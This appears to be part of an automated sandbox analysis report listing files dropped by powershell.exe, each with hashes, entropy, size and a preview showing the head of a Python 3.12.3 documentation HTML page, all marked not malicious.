                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (604), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):51793
                                                                                                    Entropy (8bit):5.054280029744108
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:+HtxlVcM0vfpuaC4hGFX7r3nEkq6InCfbflI3IenQpFUAjK6P1WTKmtTq/4u5wqF:StPaM84KLLpTttLdpOi6RHfBMa764N
                                                                                                    MD5:0AD73FA70402B41D81FE4ABB237FC821
                                                                                                    SHA1:14F031F4B6D1DC6814A11BFC2DB3DF32E9EB98EB
                                                                                                    SHA-256:3444135FD37C95FF3C2A423305FF26A3065B75C5A05F37D01D6FB65ABC51B89B
                                                                                                    SHA-512:525A4535C12071F077A360279277FC015A2842F0BB000D48F13407DF21F26C3EB131DB7A158A83B439D7BBA060803103B2E8F4313C872F9AA8D5F288D1A62CE5
                                                                                                    Malicious:false
                                                                                                    Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, ASCII text, with very long lines (523), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):96550
                                                                                                    Entropy (8bit):5.0116874718263045
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:btPaMsq/5quAVm4rP75fk9FL1PRv0qUbcnxuNO0VbMa764N:Uq/5quAc4P5fk9FL1PRvzUbcxuNO0VCg
                                                                                                    MD5:7E84F45BAB2C45D0F888920D899DD6C5
                                                                                                    SHA1:C71C23740F99A64F5C11671FB5B2EE84ED6A9CCE
                                                                                                    SHA-256:B56C13ADDDC7827F31CB2CCED12FFC220D313BDB1416A0EC7C73BB8B89E7072D
                                                                                                    SHA-512:1638223515C4C709225F570D1064A307C3DCDDBAB1DA18233ACD3466C7EE66D96311BF9BCEA97B1BDA4806BBDE7A9349614A6BF2E80043BDB5AEBEFA5E4A65BD
                                                                                                    Malicious:false
                                                                                                    Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (412), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):43553
                                                                                                    Entropy (8bit):5.007670927441984
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:wHtxlVcMwtU3K+uNdqIqGAf3gLa++ff7tTnr0kiPGT5pQSAFwH9ZhL6Wvb5e+csj:ktPaMjmu8I0th9736fp+YlfRQcMa764N
                                                                                                    MD5:B22CD9B991FC3B3F935DF7FFF22B1855
                                                                                                    SHA1:A3E518C677DEFA17FF2A8D7D3453716580FA85E3
                                                                                                    SHA-256:8857447239379742D600DE435EECA55D2B03083E7084DD72E01AB94907CE514A
                                                                                                    SHA-512:F5D21BAF269CFDF4B1F1B8FABC2130360E15057302F1E1F11C4C68814E83DF246F880D3F2616C2E14CFA30AF6C59CD619F31F86C97F50FFE81E5E8BD2231AD0A
                                                                                                    Malicious:false
                                                                                                    Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (496), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49979
                                                                                                    Entropy (8bit):5.097731558989144
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:NHtxlVcMWTDTjTNTNTjTRTVT1TTTzT0uTLTJTTTTTvTTTrT7TnTrT9RTRTnT/Td0:9tPaMzkYrRYIkbrRETVVMa764N
                                                                                                    MD5:6DE7AF214248E9A32AB01FE8CD276E32
                                                                                                    SHA1:82F32645B6A21B33EF8D1ADC4B9A2562B71DABEC
                                                                                                    SHA-256:2B07B61E79F4C7078377245B82D88FC9062D64BA55C33A618DEAB68A86060DFC
                                                                                                    SHA-512:97A897E0C5DCD7CEF16CF1A67E0BBB72767397F18F3FEFD6691F6AF50DC8E446229772B98865D72580D59D28732E1D3860B59BD3660FCA62A1D9DC9A08E9040A
                                                                                                    Malicious:false
                                                                                                    Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, ASCII text, with very long lines (2012), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):326130
                                                                                                    Entropy (8bit):5.312932319566024
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:OtPaMVK7oOdO3nMkjRtf2S0EY/1uiIifFZEcAvoA3IR0tQ9/0LJ7sMa764N:MK7VdO3nBjRtf2S0EY/AiIiAoA34pOpg
                                                                                                    MD5:0B08355B9B5014056E4A0187F312121F
                                                                                                    SHA1:F038A3A8F1B8394598FBA68C9389936B7CBEA700
                                                                                                    SHA-256:908F818EC8B58DF69303B56EEE98D61AAE86E23C422F70EC7C5C82936AB1F652
                                                                                                    SHA-512:5C9F2A119B7A6EAF4837554FEAA7AEA20B3E5D83587BB253A5B857192DCB629EA9B7D4B99A36C9ADF8AA88E222BF6C3147A4F899E3669438C9276794628DB026
                                                                                                    Malicious:false
                                                                                                    Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15186
                                                                                                    Entropy (8bit):4.962719177548245
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:XHtxlVcMe7sf8R+AMWMbDskiNJwdxly0fntTSNAVUraXO5GUuEr99RDvPYePb8Au:3tPaMQrmoCMa764N
                                                                                                    MD5:523948AEB957D3325C1F525FD0EDF9B4
                                                                                                    SHA1:62499685BEB5BA34C171BBA91A7FC7DC692E893B
                                                                                                    SHA-256:3F0A4D1808677C3C67974883274A6D87071BCED522D390E72FBDCE7A8C373EE4
                                                                                                    SHA-512:D6576D5D053653C38A8C05ADDB1EAED44383D8C06FA8B54CDBEC880D66ED49D0DBE58A6FD88B2B4635B16E350837CE6EA2CBEBA245B645F15A65F981E13025D4
                                                                                                    Malicious:false
                                                                                                    Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, ASCII text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):114563
                                                                                                    Entropy (8bit):5.1261880017479475
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:AtPaMlUhMJ3Fzjp6ccYg7q4P1ft9s/RSG/OnMa764N:ZhMJ3Fzjp6ccYg7q4P1fLOAG/g
                                                                                                    MD5:B991D94FF7439D6B8BE1CAABA6E401AB
                                                                                                    SHA1:C1208D8DCCF71877D345AF2E8F47D9247D28FF2D
                                                                                                    SHA-256:3EDC7E37AC59400B967CA99AF24E89916135072AB662FBEC5FB246B531F2BBC1
                                                                                                    SHA-512:A0CBE427F5806525EDBB6AD30A76D3848FA550998CB224DBD22C2D1E549E0CBD461766B0994AEE5B2A960434C21EEF6FCA668573C1A132BB56638F46F7FECB34
                                                                                                    Malicious:false
                                                                                                    Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, ASCII text, with very long lines (494), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):170009
                                                                                                    Entropy (8bit):5.064420777617153
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:hKlaHgyy5QSrkvD8Zw2FTpFi99e5ANxZ1mqwl5hMEkjt3lsBb3RGg:MlaHgyymSrkcTbiXe5ANvjwl5hMEkjXa
                                                                                                    MD5:8E10C231529B745B5C52BEAB43E2CEDA
                                                                                                    SHA1:1FD275DAD9F02F5614E8A5EEA601E680E6A261CB
                                                                                                    SHA-256:029608137BCE9F55DD4E6CD1ECC82F70CF7AE01F1BA5244C0E1F3E68B49CB604
                                                                                                    SHA-512:AEAC97F16E3AC839206195D3F84501AB0989DBE86844EA1969E3DA7948349CF6BA759B92CEB86531A61F13F3E58DB44CF1172C52B1C364BAB0271BE03EC1B891
                                                                                                    Malicious:false
                                                                                                    Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, ASCII text, with very long lines (485), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):76856
                                                                                                    Entropy (8bit):4.704700073649213
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:FtPaMTSyKVWgLBU6r0xwFbv7rSmFBknNuRMa764N:FtPaMw33NemjknkRMa764N
                                                                                                    MD5:A6412C8C11411E1890BE7422315B5AF4
                                                                                                    SHA1:284070D2E72F3D659C91F4D255C05D62475A0068
                                                                                                    SHA-256:2911DB24DD19DEDF31B54357F2051AA70114E86D9ADF665698F7F31B2FE7E7BC
                                                                                                    SHA-512:E63A61BB3571DD1A8C9ECB42319B952B5D470DA3A2E3F3A1C0F3BF14462DE840F4276E9CDF87D7C038C75C2E18A837EB79E6756F80EB7C9844A85CA500FFB54B
                                                                                                    Malicious:false
                                                                                                    Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, ASCII text, with very long lines (375), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):73415
                                                                                                    Entropy (8bit):4.930979981685583
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:KtPaMPEDNjFOdyq23mSb9k8rAiNC8KtXyDZMa764N:IEDNjFOdyq23mSb9k88iNC8KdyDcg
                                                                                                    MD5:6D5C520382309B27F861EC9BEA3E1AB3
                                                                                                    SHA1:4521F3818496A73F428978E8E9A0857B6B3B8F8C
                                                                                                    SHA-256:EA0C88E95B22447717A33343986E9D22AFF0E5417FF8DC58525886E5CD7338B3
                                                                                                    SHA-512:1058BBC384830755B5206CFD76EA7DFE18097AF8E17792DB97B9DE63A9A1AC298636628513E87D7F49DDB1576BB8466C97866F70A205EC761D1B39B27727BA79
                                                                                                    Malicious:false
                                                                                                    Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):44777
                                                                                                    Entropy (8bit):4.99039103442667
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:zHtxlVcMHXHjE5OirDBrXhDRgHQjaDlA4T7VP2iOJ7YBr4h1Ny6jVKWTR3VO2CHP:TtPaMe0aimbMu9j/WUU7NN0KMa764N
                                                                                                    MD5:A46BB05456CFE2B3BAE48A7F4F0B9CEC
                                                                                                    SHA1:F0AC5E96E2944C5DE62B694CB60167CF65EA2036
                                                                                                    SHA-256:152D4F0A4F8991BB89918BCC2CA7E9A7F4C53D24CCEB9CB7224B1075A7CD9CDF
                                                                                                    SHA-512:0A1D48C53D0649961BBCA1BB7D4290641DB70C7AE97A0EEC0A2BF6C02481A724153437F6C427638F41BAA0827EC519AEE727EC825DEB5E4ACC4A18FDBDA414E5
                                                                                                    Malicious:false
                                                                                                    Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (521), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):62949
                                                                                                    Entropy (8bit):4.9403040035502
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:9HtxlVcM1btxV3BctBwFXnHnnPbPU/y1vrFPhnjkyjBM97RIEi0y8E8XvvHXhiQM:ttPaM7G3vbk2ppm/x32+Zrl2SMa764N
                                                                                                    MD5:ED43EF4115A96A7EB28A5865951F8397
                                                                                                    SHA1:D6C4CC3DB20DB5A5035DA0EF57FF16C1449CFAE0
                                                                                                    SHA-256:D0F0388FBACDE91BE4BB3344164930C8E1FD79B6F4E1F2970F94362D0C353690
                                                                                                    SHA-512:8E3FAD54CA59517ACBB44B6EA9173324D4045D058276934C91BCD528E628D5CCFE4E55BC61EB07356FE6FF2CC8265C6426F38C5E36848B9FAC15E6E79FA8FB67
                                                                                                    Malicious:false
                                                                                                    Preview:..<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Sear
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, ASCII text, with very long lines (485), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1783650
                                                                                                    Entropy (8bit):5.123361387624057
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:dUDo6elkPFAkwiXdzE8qEt8XJ9RYmLU/gS58mVK0k9FL1PGlN5CuRW+aHgh5ANvj:UFpx5CujAs1ENEor
                                                                                                    MD5:94856BD9FB4AB432150E8C57E412BEB1
                                                                                                    SHA1:1D9A96B093613BA261455814C4559487120D6305
                                                                                                    SHA-256:B7C5E825A619824659427A5AAC0D7D046D52FD2C1472E6829A4C000040873DD1
                                                                                                    SHA-512:295C39C2B5DC6C802E7F34288AE02170968CFC4639E10602693541C966EB54AF5A31B2EB0D1C076201111EC08D7095BD53232FF54D61994A0C4FA0FC01758670
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Search
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10901
                                                                                                    Entropy (8bit):4.825159525607657
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:6sbUHtxX1vjVrcMGryzooD00ExWI0Eh2wEUg4kUoQ0kg2P0k4O8cMGrZ76dqEC:8HtxldcMvs3QcMa76dqEC
                                                                                                    MD5:5C4AEE04E448472084418A3F6E691933
                                                                                                    SHA1:37B8DDBAEFF2F93AFE14A3D1EEDCC4D4DCE1FD15
                                                                                                    SHA-256:7055414F7C3BEE2416A1863E3E0E04FB35B73A7E299EB0B908EDDFBAF55C135D
                                                                                                    SHA-512:17A858E613A0353284B99FE9A74CB685FD892A2239400F8CB322C1A67B099DA5E3B328BFBFC02B77FA8ED236AE79CEB77B79F7BB2205DAEE408CCBC27F112E78
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Search
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1298), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25570
                                                                                                    Entropy (8bit):4.872560761862971
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:UOqyCyFLMInEg4xXVammcyF2yFsyF7yYoaobhyF8yFohajavST8yF5NaogDHfcyG:UOqydLMInEg4xXVammcyF2yFsyF7yYoq
                                                                                                    MD5:F10EE74CCDF0B0155E7F3966AD012463
                                                                                                    SHA1:C42740F265391E774158FAE9E3BE7740CF2CDC36
                                                                                                    SHA-256:E4AE186E2597D0A87A89A5F32D17F65A9505BD7282DAAA37B2296F6B0E195324
                                                                                                    SHA-512:3F1165602B9648FDA174FBE990E4CD42FF1241B77239E05994D1477C8A5EADD8E56D60B712A97B6389EC63B19DAF01405F933FEBFF95F0EB532F35C738BE493B
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tkinter.font . Tkinter font wrapper" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tkinter.font.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tkinter/font.py The tkinter.font module provides the Font class for creating and using named fonts. The different font weights and slants are:" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tkinter/font.py The tkinter.font module provides the Font clas
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1551), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):112925
                                                                                                    Entropy (8bit):4.860173354990031
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:qqqy+tcM5YbJ2k+3yFdyF8ySpyTcyY4yF0A3wGoA3yFdyF8ySpyYoMvKOcgg1vX6:Q0gAvMvBc+Oewdg
                                                                                                    MD5:228C5C9D82D574C305556CA3D37C74D5
                                                                                                    SHA1:87B5F681B462DC18C4D6B077EDBB6CC011C54053
                                                                                                    SHA-256:8F2A6DE50279010B2CE70EAA3DE0848FD4D8EEB68EE9A7D3F350F1D328ABC871
                                                                                                    SHA-512:0C506A52BAB8D7F140F7236DF1D4CB5B0703D9455DE76E538CCE1DFECED1FA89B8976850ABA1A646429D931C7BB249E835FBE239C7EA56C12F7368CB628E57F3
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="tkinter . Python interface to Tcl/Tk" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/tkinter.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/tkinter/__init__.py The tkinter package (.Tk interface.) is the standard Python interface to the Tcl/Tk GUI toolkit. Both Tk and tkinter are available on most Unix platforms, inclu..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/tkinter/__init__.py T
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1130), with CRLF line terminators
